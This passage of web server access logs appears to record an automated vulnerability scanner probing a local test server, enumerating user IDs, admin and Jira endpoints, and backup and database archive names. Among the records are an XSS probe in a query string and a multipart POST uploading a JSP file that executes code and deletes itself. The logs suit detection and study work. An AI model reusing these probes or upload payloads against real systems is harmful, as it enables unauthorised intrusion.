HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/24 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.124","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/25 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/26 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/28 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/29 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/30 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/31 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/32 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/33 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/34 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.159","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.141","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.123","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/dashboard?maxResults=100 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/35 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.121","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.113","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/dashboard?maxResults=100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2212.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(364536*876356);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.064","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/36 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/37 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/38 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 